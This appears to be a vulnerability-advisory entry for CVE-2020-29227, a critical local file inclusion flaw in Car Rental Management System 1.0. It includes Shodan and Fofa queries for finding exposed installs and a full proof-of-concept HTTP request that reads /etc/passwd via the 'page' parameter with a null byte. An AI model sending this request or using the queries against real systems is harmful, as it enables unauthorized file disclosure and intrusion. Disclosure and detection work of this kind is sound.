| Title | Car Rental Management System 1.0 - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Critical |
| Impact | An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. |
| Remediation | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in the Car Rental Management System 1.0. |
| CVSS Score | 9.8 |
| EPSS Score | 0.93408 |
| CVE ID | CVE-2020-29227 |
| Shodan Query | http.html:"car rental management system" |
| Fofa Query | body="car rental management system" |
| Tags | cve cve2020 lfi car_rental_management_system_project sqli vkev vuln |
Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the “page” parameter, leading to code execution.
GET /index.php?page=/etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-29227.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-29227.pcap
N/AN/A